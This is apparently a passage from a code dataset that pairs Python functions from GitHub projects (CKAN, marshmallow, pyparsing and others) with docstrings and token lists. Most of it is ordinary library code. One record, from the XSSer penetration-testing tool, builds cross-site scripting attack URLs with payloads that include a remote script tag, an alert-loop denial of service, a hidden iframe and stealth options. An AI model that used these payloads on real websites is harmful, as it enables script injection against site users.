_check_access('organization_list_for_user', context, data_dict)
sysadmin = authz.is_sysadmin(user)
orgs_q = model.Session.query(model.Group) \
.filter(model.Group.is_organization == True) \
.filter(model.Group.state == 'active')
if sysadmin:
orgs_and_capacities = [(org, 'admin') for org in orgs_q.all()]
else:
# for non-Sysadmins check they have the required permission
permission = data_dict.get('permission', 'manage_group')
roles = authz.get_roles_with_permission(permission)
if not roles:
return []
user_id = authz.get_user_id_for_username(user, allow_none=True)
if not user_id:
return []
q = model.Session.query(model.Member, model.Group) \
.filter(model.Member.table_name == 'user') \
.filter(model.Member.capacity.in_(roles)) \
.filter(model.Member.table_id == user_id) \
.filter(model.Member.state == 'active') \
.join(model.Group)
group_ids = set()
roles_that_cascade = \
authz.check_config_permission('roles_that_cascade_to_sub_groups')
group_ids_to_capacities = {}
for member, group in q.all():
if member.capacity in roles_that_cascade:
children_group_ids = [
grp_tuple[0] for grp_tuple
in group.get_children_group_hierarchy(type='organization')
]
for group_id in children_group_ids:
group_ids_to_capacities[group_id] = member.capacity
group_ids |= set(children_group_ids)
group_ids_to_capacities[group.id] = member.capacity
group_ids.add(group.id)
if not group_ids:
return []
orgs_q = orgs_q.filter(model.Group.id.in_(group_ids))
orgs_and_capacities = [
(org, group_ids_to_capacities[org.id]) for org in orgs_q.all()]
context['with_capacity'] = True
orgs_list = model_dictize.group_list_dictize(orgs_and_capacities, context,
with_package_counts=asbool(data_dict.get('include_dataset_count')))
return orgs_list
|
[
"def",
"organization_list_for_user",
"(",
"context",
",",
"data_dict",
")",
":",
"model",
"=",
"context",
"[",
"'model'",
"]",
"if",
"data_dict",
".",
"get",
"(",
"'id'",
")",
":",
"user_obj",
"=",
"model",
".",
"User",
".",
"get",
"(",
"data_dict",
"[",
"'id'",
"]",
")",
"if",
"not",
"user_obj",
":",
"raise",
"NotFound",
"user",
"=",
"user_obj",
".",
"name",
"else",
":",
"user",
"=",
"context",
"[",
"'user'",
"]",
"_check_access",
"(",
"'organization_list_for_user'",
",",
"context",
",",
"data_dict",
")",
"sysadmin",
"=",
"authz",
".",
"is_sysadmin",
"(",
"user",
")",
"orgs_q",
"=",
"model",
".",
"Session",
".",
"query",
"(",
"model",
".",
"Group",
")",
".",
"filter",
"(",
"model",
".",
"Group",
".",
"is_organization",
"==",
"True",
")",
".",
"filter",
"(",
"model",
".",
"Group",
".",
"state",
"==",
"'active'",
")",
"if",
"sysadmin",
":",
"orgs_and_capacities",
"=",
"[",
"(",
"org",
",",
"'admin'",
")",
"for",
"org",
"in",
"orgs_q",
".",
"all",
"(",
")",
"]",
"else",
":",
"# for non-Sysadmins check they have the required permission",
"permission",
"=",
"data_dict",
".",
"get",
"(",
"'permission'",
",",
"'manage_group'",
")",
"roles",
"=",
"authz",
".",
"get_roles_with_permission",
"(",
"permission",
")",
"if",
"not",
"roles",
":",
"return",
"[",
"]",
"user_id",
"=",
"authz",
".",
"get_user_id_for_username",
"(",
"user",
",",
"allow_none",
"=",
"True",
")",
"if",
"not",
"user_id",
":",
"return",
"[",
"]",
"q",
"=",
"model",
".",
"Session",
".",
"query",
"(",
"model",
".",
"Member",
",",
"model",
".",
"Group",
")",
".",
"filter",
"(",
"model",
".",
"Member",
".",
"table_name",
"==",
"'user'",
")",
".",
"filter",
"(",
"model",
".",
"Member",
".",
"capacity",
".",
"in_",
"(",
"roles",
")",
")",
".",
"filter",
"(",
"model",
".",
"Member",
".",
"table_id",
"==",
"user_id",
")",
".",
"filter",
"(",
"model",
".",
"Member",
".",
"state",
"==",
"'active'",
")",
".",
"join",
"(",
"model",
".",
"Group",
")",
"group_ids",
"=",
"set",
"(",
")",
"roles_that_cascade",
"=",
"authz",
".",
"check_config_permission",
"(",
"'roles_that_cascade_to_sub_groups'",
")",
"group_ids_to_capacities",
"=",
"{",
"}",
"for",
"member",
",",
"group",
"in",
"q",
".",
"all",
"(",
")",
":",
"if",
"member",
".",
"capacity",
"in",
"roles_that_cascade",
":",
"children_group_ids",
"=",
"[",
"grp_tuple",
"[",
"0",
"]",
"for",
"grp_tuple",
"in",
"group",
".",
"get_children_group_hierarchy",
"(",
"type",
"=",
"'organization'",
")",
"]",
"for",
"group_id",
"in",
"children_group_ids",
":",
"group_ids_to_capacities",
"[",
"group_id",
"]",
"=",
"member",
".",
"capacity",
"group_ids",
"|=",
"set",
"(",
"children_group_ids",
")",
"group_ids_to_capacities",
"[",
"group",
".",
"id",
"]",
"=",
"member",
".",
"capacity",
"group_ids",
".",
"add",
"(",
"group",
".",
"id",
")",
"if",
"not",
"group_ids",
":",
"return",
"[",
"]",
"orgs_q",
"=",
"orgs_q",
".",
"filter",
"(",
"model",
".",
"Group",
".",
"id",
".",
"in_",
"(",
"group_ids",
")",
")",
"orgs_and_capacities",
"=",
"[",
"(",
"org",
",",
"group_ids_to_capacities",
"[",
"org",
".",
"id",
"]",
")",
"for",
"org",
"in",
"orgs_q",
".",
"all",
"(",
")",
"]",
"context",
"[",
"'with_capacity'",
"]",
"=",
"True",
"orgs_list",
"=",
"model_dictize",
".",
"group_list_dictize",
"(",
"orgs_and_capacities",
",",
"context",
",",
"with_package_counts",
"=",
"asbool",
"(",
"data_dict",
".",
"get",
"(",
"'include_dataset_count'",
")",
")",
")",
"return",
"orgs_list"
] |
https://github.com/ckan/ckan/blob/b3b01218ad88ed3fb914b51018abe8b07b07bff3/ckan/logic/action/get.py#L609-L717
|
|
marshmallow-code/marshmallow
|
58c2045b8f272c2f1842458aa79f5c079a01429f
|
src/marshmallow/schema.py
|
python
|
Schema._do_load
|
(
self,
data: (
typing.Mapping[str, typing.Any]
| typing.Iterable[typing.Mapping[str, typing.Any]]
),
*,
many: bool | None = None,
partial: bool | types.StrSequenceOrSet | None = None,
unknown: str | None = None,
postprocess: bool = True,
)
|
return result
|
Deserialize `data`, returning the deserialized result.
This method is private API.
:param data: The data to deserialize.
:param many: Whether to deserialize `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to validate required fields. If its
value is an iterable, only fields listed in that iterable will be
ignored will be allowed missing. If `True`, all fields will be allowed missing.
If `None`, the value for `self.partial` is used.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:param postprocess: Whether to run post_load methods..
:return: Deserialized data
|
Deserialize `data`, returning the deserialized result.
This method is private API.
|
[
"Deserialize",
"data",
"returning",
"the",
"deserialized",
"result",
".",
"This",
"method",
"is",
"private",
"API",
"."
] |
def _do_load(
self,
data: (
typing.Mapping[str, typing.Any]
| typing.Iterable[typing.Mapping[str, typing.Any]]
),
*,
many: bool | None = None,
partial: bool | types.StrSequenceOrSet | None = None,
unknown: str | None = None,
postprocess: bool = True,
):
"""Deserialize `data`, returning the deserialized result.
This method is private API.
:param data: The data to deserialize.
:param many: Whether to deserialize `data` as a collection. If `None`, the
value for `self.many` is used.
:param partial: Whether to validate required fields. If its
value is an iterable, only fields listed in that iterable will be
ignored will be allowed missing. If `True`, all fields will be allowed missing.
If `None`, the value for `self.partial` is used.
:param unknown: Whether to exclude, include, or raise an error for unknown
fields in the data. Use `EXCLUDE`, `INCLUDE` or `RAISE`.
If `None`, the value for `self.unknown` is used.
:param postprocess: Whether to run post_load methods..
:return: Deserialized data
"""
error_store = ErrorStore()
errors = {} # type: dict[str, list[str]]
many = self.many if many is None else bool(many)
unknown = unknown or self.unknown
if partial is None:
partial = self.partial
# Run preprocessors
if self._has_processors(PRE_LOAD):
try:
processed_data = self._invoke_load_processors(
PRE_LOAD, data, many=many, original_data=data, partial=partial
)
except ValidationError as err:
errors = err.normalized_messages()
result = None # type: list | dict | None
else:
processed_data = data
if not errors:
# Deserialize data
result = self._deserialize(
processed_data,
error_store=error_store,
many=many,
partial=partial,
unknown=unknown,
)
# Run field-level validation
self._invoke_field_validators(
error_store=error_store, data=result, many=many
)
# Run schema-level validation
if self._has_processors(VALIDATES_SCHEMA):
field_errors = bool(error_store.errors)
self._invoke_schema_validators(
error_store=error_store,
pass_many=True,
data=result,
original_data=data,
many=many,
partial=partial,
field_errors=field_errors,
)
self._invoke_schema_validators(
error_store=error_store,
pass_many=False,
data=result,
original_data=data,
many=many,
partial=partial,
field_errors=field_errors,
)
errors = error_store.errors
# Run post processors
if not errors and postprocess and self._has_processors(POST_LOAD):
try:
result = self._invoke_load_processors(
POST_LOAD,
result,
many=many,
original_data=data,
partial=partial,
)
except ValidationError as err:
errors = err.normalized_messages()
if errors:
exc = ValidationError(errors, data=data, valid_data=result)
self.handle_error(exc, data, many=many, partial=partial)
raise exc
return result
|
[
"def",
"_do_load",
"(",
"self",
",",
"data",
":",
"(",
"typing",
".",
"Mapping",
"[",
"str",
",",
"typing",
".",
"Any",
"]",
"|",
"typing",
".",
"Iterable",
"[",
"typing",
".",
"Mapping",
"[",
"str",
",",
"typing",
".",
"Any",
"]",
"]",
")",
",",
"*",
",",
"many",
":",
"bool",
"|",
"None",
"=",
"None",
",",
"partial",
":",
"bool",
"|",
"types",
".",
"StrSequenceOrSet",
"|",
"None",
"=",
"None",
",",
"unknown",
":",
"str",
"|",
"None",
"=",
"None",
",",
"postprocess",
":",
"bool",
"=",
"True",
",",
")",
":",
"error_store",
"=",
"ErrorStore",
"(",
")",
"errors",
"=",
"{",
"}",
"# type: dict[str, list[str]]",
"many",
"=",
"self",
".",
"many",
"if",
"many",
"is",
"None",
"else",
"bool",
"(",
"many",
")",
"unknown",
"=",
"unknown",
"or",
"self",
".",
"unknown",
"if",
"partial",
"is",
"None",
":",
"partial",
"=",
"self",
".",
"partial",
"# Run preprocessors",
"if",
"self",
".",
"_has_processors",
"(",
"PRE_LOAD",
")",
":",
"try",
":",
"processed_data",
"=",
"self",
".",
"_invoke_load_processors",
"(",
"PRE_LOAD",
",",
"data",
",",
"many",
"=",
"many",
",",
"original_data",
"=",
"data",
",",
"partial",
"=",
"partial",
")",
"except",
"ValidationError",
"as",
"err",
":",
"errors",
"=",
"err",
".",
"normalized_messages",
"(",
")",
"result",
"=",
"None",
"# type: list | dict | None",
"else",
":",
"processed_data",
"=",
"data",
"if",
"not",
"errors",
":",
"# Deserialize data",
"result",
"=",
"self",
".",
"_deserialize",
"(",
"processed_data",
",",
"error_store",
"=",
"error_store",
",",
"many",
"=",
"many",
",",
"partial",
"=",
"partial",
",",
"unknown",
"=",
"unknown",
",",
")",
"# Run field-level validation",
"self",
".",
"_invoke_field_validators",
"(",
"error_store",
"=",
"error_store",
",",
"data",
"=",
"result",
",",
"many",
"=",
"many",
")",
"# Run schema-level validation",
"if",
"self",
".",
"_has_processors",
"(",
"VALIDATES_SCHEMA",
")",
":",
"field_errors",
"=",
"bool",
"(",
"error_store",
".",
"errors",
")",
"self",
".",
"_invoke_schema_validators",
"(",
"error_store",
"=",
"error_store",
",",
"pass_many",
"=",
"True",
",",
"data",
"=",
"result",
",",
"original_data",
"=",
"data",
",",
"many",
"=",
"many",
",",
"partial",
"=",
"partial",
",",
"field_errors",
"=",
"field_errors",
",",
")",
"self",
".",
"_invoke_schema_validators",
"(",
"error_store",
"=",
"error_store",
",",
"pass_many",
"=",
"False",
",",
"data",
"=",
"result",
",",
"original_data",
"=",
"data",
",",
"many",
"=",
"many",
",",
"partial",
"=",
"partial",
",",
"field_errors",
"=",
"field_errors",
",",
")",
"errors",
"=",
"error_store",
".",
"errors",
"# Run post processors",
"if",
"not",
"errors",
"and",
"postprocess",
"and",
"self",
".",
"_has_processors",
"(",
"POST_LOAD",
")",
":",
"try",
":",
"result",
"=",
"self",
".",
"_invoke_load_processors",
"(",
"POST_LOAD",
",",
"result",
",",
"many",
"=",
"many",
",",
"original_data",
"=",
"data",
",",
"partial",
"=",
"partial",
",",
")",
"except",
"ValidationError",
"as",
"err",
":",
"errors",
"=",
"err",
".",
"normalized_messages",
"(",
")",
"if",
"errors",
":",
"exc",
"=",
"ValidationError",
"(",
"errors",
",",
"data",
"=",
"data",
",",
"valid_data",
"=",
"result",
")",
"self",
".",
"handle_error",
"(",
"exc",
",",
"data",
",",
"many",
"=",
"many",
",",
"partial",
"=",
"partial",
")",
"raise",
"exc",
"return",
"result"
] |
https://github.com/marshmallow-code/marshmallow/blob/58c2045b8f272c2f1842458aa79f5c079a01429f/src/marshmallow/schema.py#L805-L902
|
|
linux-system-roles/network
|
20667b086068516dff248760e00f844b333eb727
|
module_utils/network_lsr/nm_provider.py
|
python
|
get_nm_ethtool_feature
|
(name)
|
return feature
|
Translate ethtool feature into Network Manager name
:param name: Name of the feature
:type name: str
:returns: Name of the feature to be used by `NM.SettingEthtool.set_feature()`
:rtype: str
|
Translate ethtool feature into Network Manager name
|
[
"Translate",
"ethtool",
"feature",
"into",
"Network",
"Manager",
"name"
] |
def get_nm_ethtool_feature(name):
"""
Translate ethtool feature into Network Manager name
:param name: Name of the feature
:type name: str
:returns: Name of the feature to be used by `NM.SettingEthtool.set_feature()`
:rtype: str
"""
name = ETHTOOL_FEATURE_PREFIX + name.upper()
feature = getattr(Util.NM(), name, None)
return feature
|
[
"def",
"get_nm_ethtool_feature",
"(",
"name",
")",
":",
"name",
"=",
"ETHTOOL_FEATURE_PREFIX",
"+",
"name",
".",
"upper",
"(",
")",
"feature",
"=",
"getattr",
"(",
"Util",
".",
"NM",
"(",
")",
",",
"name",
",",
"None",
")",
"return",
"feature"
] |
https://github.com/linux-system-roles/network/blob/20667b086068516dff248760e00f844b333eb727/module_utils/network_lsr/nm_provider.py#L16-L29
|
|
cbrgm/telegram-robot-rss
|
58fe98de427121fdc152c8df0721f1891174e6c9
|
venv/lib/python2.7/site-packages/pkg_resources/_vendor/pyparsing.py
|
python
|
ParserElement.runTests
|
(self, tests, parseAll=True, comment='#', fullDump=True, printResults=True, failureTests=False)
|
return success, allResults
|
Execute the parse expression on a series of test strings, showing each
test, the parsed results or where the parse failed. Quick and easy way to
run a parse expression against a list of sample strings.
Parameters:
- tests - a list of separate test strings, or a multiline string of test strings
- parseAll - (default=C{True}) - flag to pass to C{L{parseString}} when running tests
- comment - (default=C{'#'}) - expression for indicating embedded comments in the test
string; pass None to disable comment filtering
- fullDump - (default=C{True}) - dump results as list followed by results names in nested outline;
if False, only dump nested list
- printResults - (default=C{True}) prints test output to stdout
- failureTests - (default=C{False}) indicates if these tests are expected to fail parsing
Returns: a (success, results) tuple, where success indicates that all tests succeeded
(or failed if C{failureTests} is True), and the results contain a list of lines of each
test's output
Example::
number_expr = pyparsing_common.number.copy()
result = number_expr.runTests('''
# unsigned integer
100
# negative integer
-100
# float with scientific notation
6.02e23
# integer with scientific notation
1e-12
''')
print("Success" if result[0] else "Failed!")
result = number_expr.runTests('''
# stray character
100Z
# missing leading digit before '.'
-.100
# too many '.'
3.14.159
''', failureTests=True)
print("Success" if result[0] else "Failed!")
prints::
# unsigned integer
100
[100]
# negative integer
-100
[-100]
# float with scientific notation
6.02e23
[6.02e+23]
# integer with scientific notation
1e-12
[1e-12]
Success
# stray character
100Z
^
FAIL: Expected end of text (at char 3), (line:1, col:4)
# missing leading digit before '.'
-.100
^
FAIL: Expected {real number with scientific notation | real number | signed integer} (at char 0), (line:1, col:1)
# too many '.'
3.14.159
^
FAIL: Expected end of text (at char 4), (line:1, col:5)
Success
Each test string must be on a single line. If you want to test a string that spans multiple
lines, create a test like this::
expr.runTest(r"this is a test\\n of strings that spans \\n 3 lines")
(Note that this is a raw string literal, you must include the leading 'r'.)
|
Execute the parse expression on a series of test strings, showing each
test, the parsed results or where the parse failed. Quick and easy way to
run a parse expression against a list of sample strings.
Parameters:
- tests - a list of separate test strings, or a multiline string of test strings
- parseAll - (default=C{True}) - flag to pass to C{L{parseString}} when running tests
- comment - (default=C{'#'}) - expression for indicating embedded comments in the test
string; pass None to disable comment filtering
- fullDump - (default=C{True}) - dump results as list followed by results names in nested outline;
if False, only dump nested list
- printResults - (default=C{True}) prints test output to stdout
- failureTests - (default=C{False}) indicates if these tests are expected to fail parsing
|
[
"Execute",
"the",
"parse",
"expression",
"on",
"a",
"series",
"of",
"test",
"strings",
"showing",
"each",
"test",
"the",
"parsed",
"results",
"or",
"where",
"the",
"parse",
"failed",
".",
"Quick",
"and",
"easy",
"way",
"to",
"run",
"a",
"parse",
"expression",
"against",
"a",
"list",
"of",
"sample",
"strings",
".",
"Parameters",
":",
"-",
"tests",
"-",
"a",
"list",
"of",
"separate",
"test",
"strings",
"or",
"a",
"multiline",
"string",
"of",
"test",
"strings",
"-",
"parseAll",
"-",
"(",
"default",
"=",
"C",
"{",
"True",
"}",
")",
"-",
"flag",
"to",
"pass",
"to",
"C",
"{",
"L",
"{",
"parseString",
"}}",
"when",
"running",
"tests",
"-",
"comment",
"-",
"(",
"default",
"=",
"C",
"{",
"#",
"}",
")",
"-",
"expression",
"for",
"indicating",
"embedded",
"comments",
"in",
"the",
"test",
"string",
";",
"pass",
"None",
"to",
"disable",
"comment",
"filtering",
"-",
"fullDump",
"-",
"(",
"default",
"=",
"C",
"{",
"True",
"}",
")",
"-",
"dump",
"results",
"as",
"list",
"followed",
"by",
"results",
"names",
"in",
"nested",
"outline",
";",
"if",
"False",
"only",
"dump",
"nested",
"list",
"-",
"printResults",
"-",
"(",
"default",
"=",
"C",
"{",
"True",
"}",
")",
"prints",
"test",
"output",
"to",
"stdout",
"-",
"failureTests",
"-",
"(",
"default",
"=",
"C",
"{",
"False",
"}",
")",
"indicates",
"if",
"these",
"tests",
"are",
"expected",
"to",
"fail",
"parsing"
] |
def runTests(self, tests, parseAll=True, comment='#', fullDump=True, printResults=True, failureTests=False):
"""
Execute the parse expression on a series of test strings, showing each
test, the parsed results or where the parse failed. Quick and easy way to
run a parse expression against a list of sample strings.
Parameters:
- tests - a list of separate test strings, or a multiline string of test strings
- parseAll - (default=C{True}) - flag to pass to C{L{parseString}} when running tests
- comment - (default=C{'#'}) - expression for indicating embedded comments in the test
string; pass None to disable comment filtering
- fullDump - (default=C{True}) - dump results as list followed by results names in nested outline;
if False, only dump nested list
- printResults - (default=C{True}) prints test output to stdout
- failureTests - (default=C{False}) indicates if these tests are expected to fail parsing
Returns: a (success, results) tuple, where success indicates that all tests succeeded
(or failed if C{failureTests} is True), and the results contain a list of lines of each
test's output
Example::
number_expr = pyparsing_common.number.copy()
result = number_expr.runTests('''
# unsigned integer
100
# negative integer
-100
# float with scientific notation
6.02e23
# integer with scientific notation
1e-12
''')
print("Success" if result[0] else "Failed!")
result = number_expr.runTests('''
# stray character
100Z
# missing leading digit before '.'
-.100
# too many '.'
3.14.159
''', failureTests=True)
print("Success" if result[0] else "Failed!")
prints::
# unsigned integer
100
[100]
# negative integer
-100
[-100]
# float with scientific notation
6.02e23
[6.02e+23]
# integer with scientific notation
1e-12
[1e-12]
Success
# stray character
100Z
^
FAIL: Expected end of text (at char 3), (line:1, col:4)
# missing leading digit before '.'
-.100
^
FAIL: Expected {real number with scientific notation | real number | signed integer} (at char 0), (line:1, col:1)
# too many '.'
3.14.159
^
FAIL: Expected end of text (at char 4), (line:1, col:5)
Success
Each test string must be on a single line. If you want to test a string that spans multiple
lines, create a test like this::
expr.runTest(r"this is a test\\n of strings that spans \\n 3 lines")
(Note that this is a raw string literal, you must include the leading 'r'.)
"""
if isinstance(tests, basestring):
tests = list(map(str.strip, tests.rstrip().splitlines()))
if isinstance(comment, basestring):
comment = Literal(comment)
allResults = []
comments = []
success = True
for t in tests:
if comment is not None and comment.matches(t, False) or comments and not t:
comments.append(t)
continue
if not t:
continue
out = ['\n'.join(comments), t]
comments = []
try:
t = t.replace(r'\n','\n')
result = self.parseString(t, parseAll=parseAll)
out.append(result.dump(full=fullDump))
success = success and not failureTests
except ParseBaseException as pe:
fatal = "(FATAL)" if isinstance(pe, ParseFatalException) else ""
if '\n' in t:
out.append(line(pe.loc, t))
out.append(' '*(col(pe.loc,t)-1) + '^' + fatal)
else:
out.append(' '*pe.loc + '^' + fatal)
out.append("FAIL: " + str(pe))
success = success and failureTests
result = pe
except Exception as exc:
out.append("FAIL-EXCEPTION: " + str(exc))
success = success and failureTests
result = exc
if printResults:
if fullDump:
out.append('')
print('\n'.join(out))
allResults.append((t, result))
return success, allResults
|
[
"def",
"runTests",
"(",
"self",
",",
"tests",
",",
"parseAll",
"=",
"True",
",",
"comment",
"=",
"'#'",
",",
"fullDump",
"=",
"True",
",",
"printResults",
"=",
"True",
",",
"failureTests",
"=",
"False",
")",
":",
"if",
"isinstance",
"(",
"tests",
",",
"basestring",
")",
":",
"tests",
"=",
"list",
"(",
"map",
"(",
"str",
".",
"strip",
",",
"tests",
".",
"rstrip",
"(",
")",
".",
"splitlines",
"(",
")",
")",
")",
"if",
"isinstance",
"(",
"comment",
",",
"basestring",
")",
":",
"comment",
"=",
"Literal",
"(",
"comment",
")",
"allResults",
"=",
"[",
"]",
"comments",
"=",
"[",
"]",
"success",
"=",
"True",
"for",
"t",
"in",
"tests",
":",
"if",
"comment",
"is",
"not",
"None",
"and",
"comment",
".",
"matches",
"(",
"t",
",",
"False",
")",
"or",
"comments",
"and",
"not",
"t",
":",
"comments",
".",
"append",
"(",
"t",
")",
"continue",
"if",
"not",
"t",
":",
"continue",
"out",
"=",
"[",
"'\\n'",
".",
"join",
"(",
"comments",
")",
",",
"t",
"]",
"comments",
"=",
"[",
"]",
"try",
":",
"t",
"=",
"t",
".",
"replace",
"(",
"r'\\n'",
",",
"'\\n'",
")",
"result",
"=",
"self",
".",
"parseString",
"(",
"t",
",",
"parseAll",
"=",
"parseAll",
")",
"out",
".",
"append",
"(",
"result",
".",
"dump",
"(",
"full",
"=",
"fullDump",
")",
")",
"success",
"=",
"success",
"and",
"not",
"failureTests",
"except",
"ParseBaseException",
"as",
"pe",
":",
"fatal",
"=",
"\"(FATAL)\"",
"if",
"isinstance",
"(",
"pe",
",",
"ParseFatalException",
")",
"else",
"\"\"",
"if",
"'\\n'",
"in",
"t",
":",
"out",
".",
"append",
"(",
"line",
"(",
"pe",
".",
"loc",
",",
"t",
")",
")",
"out",
".",
"append",
"(",
"' '",
"*",
"(",
"col",
"(",
"pe",
".",
"loc",
",",
"t",
")",
"-",
"1",
")",
"+",
"'^'",
"+",
"fatal",
")",
"else",
":",
"out",
".",
"append",
"(",
"' '",
"*",
"pe",
".",
"loc",
"+",
"'^'",
"+",
"fatal",
")",
"out",
".",
"append",
"(",
"\"FAIL: \"",
"+",
"str",
"(",
"pe",
")",
")",
"success",
"=",
"success",
"and",
"failureTests",
"result",
"=",
"pe",
"except",
"Exception",
"as",
"exc",
":",
"out",
".",
"append",
"(",
"\"FAIL-EXCEPTION: \"",
"+",
"str",
"(",
"exc",
")",
")",
"success",
"=",
"success",
"and",
"failureTests",
"result",
"=",
"exc",
"if",
"printResults",
":",
"if",
"fullDump",
":",
"out",
".",
"append",
"(",
"''",
")",
"print",
"(",
"'\\n'",
".",
"join",
"(",
"out",
")",
")",
"allResults",
".",
"append",
"(",
"(",
"t",
",",
"result",
")",
")",
"return",
"success",
",",
"allResults"
] |
https://github.com/cbrgm/telegram-robot-rss/blob/58fe98de427121fdc152c8df0721f1891174e6c9/venv/lib/python2.7/site-packages/pkg_resources/_vendor/pyparsing.py#L2191-L2320
|
|
pikpikcu/Pentest-Tools-Framework
|
cd6e6107764a809943dc4e073cde8149c1a2cd03
|
modules/xsser/build/lib/core/main.py
|
python
|
xsser.generate_real_attack_url
|
(self, dest_url, description, method, hashing, query_string, payload, orig_url)
|
return dest_url
|
Generate a real attack url by using data from a successfull test.
This method also applies DOM stealth mechanisms.
|
Generate a real attack url by using data from a successfull test.
|
[
"Generate",
"a",
"real",
"attack",
"url",
"by",
"using",
"data",
"from",
"a",
"successfull",
"test",
"."
] |
def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
"""
Generate a real attack url by using data from a successfull test.
This method also applies DOM stealth mechanisms.
"""
user_attack_payload = payload['payload']
if self.options.finalpayload:
user_attack_payload = self.options.finalpayload
elif self.options.finalremote:
user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
user_attack_payload = self.options.finalpayload
if self.options.dos:
user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
if self.options.doss:
user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
if self.options.b64:
user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
if self.options.onm:
user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
if self.options.ifr:
user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
do_anchor_payload = self.options.anchor
anchor_data = None
attack_hash = None
if 'PAYLOAD' in payload['payload']:
if user_attack_payload == "":
attack_hash = self.generate_hash('final')
user_attack_payload = payload['payload']
user_attack_payload = payload['payload'].replace('PAYLOAD', attack_hash)
else:
user_attack_payload = payload['payload'].replace('PAYLOAD', user_attack_payload)
if 'XSS' in user_attack_payload:
attack_hash = self.generate_hash('final')
user_attack_payload = user_attack_payload.replace('XSS', attack_hash)
if do_anchor_payload:
dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
dest_url = dest_url.replace('?', '#')
else:
dest_url, newhash = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
if attack_hash:
self.final_attacks[attack_hash] = {'url':dest_url}
return dest_url
|
[
"def",
"generate_real_attack_url",
"(",
"self",
",",
"dest_url",
",",
"description",
",",
"method",
",",
"hashing",
",",
"query_string",
",",
"payload",
",",
"orig_url",
")",
":",
"user_attack_payload",
"=",
"payload",
"[",
"'payload'",
"]",
"if",
"self",
".",
"options",
".",
"finalpayload",
":",
"user_attack_payload",
"=",
"self",
".",
"options",
".",
"finalpayload",
"elif",
"self",
".",
"options",
".",
"finalremote",
":",
"user_attack_payload",
"=",
"'<script src=\"'",
"+",
"self",
".",
"options",
".",
"finalremote",
"+",
"'\"></script>'",
"elif",
"self",
".",
"options",
".",
"finalpayload",
"or",
"self",
".",
"options",
".",
"finalremote",
"and",
"payload",
"[",
"\"browser\"",
"]",
"==",
"\"[Data Control Protocol Injection]\"",
":",
"user_attack_payload",
"=",
"'<a href=\"data:text/html;base64,'",
"+",
"b64encode",
"(",
"self",
".",
"options",
".",
"finalpayload",
")",
"+",
"'></a>'",
"elif",
"self",
".",
"options",
".",
"finalpayload",
"or",
"self",
".",
"options",
".",
"finalremote",
"and",
"payload",
"[",
"\"browser\"",
"]",
"==",
"\"[Induced Injection]\"",
":",
"user_attack_payload",
"=",
"self",
".",
"options",
".",
"finalpayload",
"if",
"self",
".",
"options",
".",
"dos",
":",
"user_attack_payload",
"=",
"'<script>for(;;)alert(\"You were XSSed!!\");</script>'",
"if",
"self",
".",
"options",
".",
"doss",
":",
"user_attack_payload",
"=",
"'<meta%20http-equiv=\"refresh\"%20content=\"0;\">'",
"if",
"self",
".",
"options",
".",
"b64",
":",
"user_attack_payload",
"=",
"'<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4\">'",
"if",
"self",
".",
"options",
".",
"onm",
":",
"user_attack_payload",
"=",
"'\"style=\"position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px\" onMouseMove=\"'",
"+",
"user_attack_payload",
"if",
"self",
".",
"options",
".",
"ifr",
":",
"user_attack_payload",
"=",
"'<iframe src=\"'",
"+",
"user_attack_payload",
"+",
"'\" width=\"0\" height=\"0\"></iframe>'",
"do_anchor_payload",
"=",
"self",
".",
"options",
".",
"anchor",
"anchor_data",
"=",
"None",
"attack_hash",
"=",
"None",
"if",
"'PAYLOAD'",
"in",
"payload",
"[",
"'payload'",
"]",
":",
"if",
"user_attack_payload",
"==",
"\"\"",
":",
"attack_hash",
"=",
"self",
".",
"generate_hash",
"(",
"'final'",
")",
"user_attack_payload",
"=",
"payload",
"[",
"'payload'",
"]",
"user_attack_payload",
"=",
"payload",
"[",
"'payload'",
"]",
".",
"replace",
"(",
"'PAYLOAD'",
",",
"attack_hash",
")",
"else",
":",
"user_attack_payload",
"=",
"payload",
"[",
"'payload'",
"]",
".",
"replace",
"(",
"'PAYLOAD'",
",",
"user_attack_payload",
")",
"if",
"'XSS'",
"in",
"user_attack_payload",
":",
"attack_hash",
"=",
"self",
".",
"generate_hash",
"(",
"'final'",
")",
"user_attack_payload",
"=",
"user_attack_payload",
".",
"replace",
"(",
"'XSS'",
",",
"attack_hash",
")",
"if",
"do_anchor_payload",
":",
"dest_url",
",",
"newhash",
"=",
"self",
".",
"get_url_payload",
"(",
"orig_url",
",",
"payload",
",",
"query_string",
",",
"user_attack_payload",
")",
"dest_url",
"=",
"dest_url",
".",
"replace",
"(",
"'?'",
",",
"'#'",
")",
"else",
":",
"dest_url",
",",
"newhash",
"=",
"self",
".",
"get_url_payload",
"(",
"orig_url",
",",
"payload",
",",
"query_string",
",",
"user_attack_payload",
")",
"if",
"attack_hash",
":",
"self",
".",
"final_attacks",
"[",
"attack_hash",
"]",
"=",
"{",
"'url'",
":",
"dest_url",
"}",
"return",
"dest_url"
] |
https://github.com/pikpikcu/Pentest-Tools-Framework/blob/cd6e6107764a809943dc4e073cde8149c1a2cd03/modules/xsser/build/lib/core/main.py#L2156-L2202
|
|
mozilla/zamboni
|
14b1a44658e47b9f048962fa52dbf00a3beaaf30
|
mkt/site/views.py
|
python
|
cspreport
|
(request)
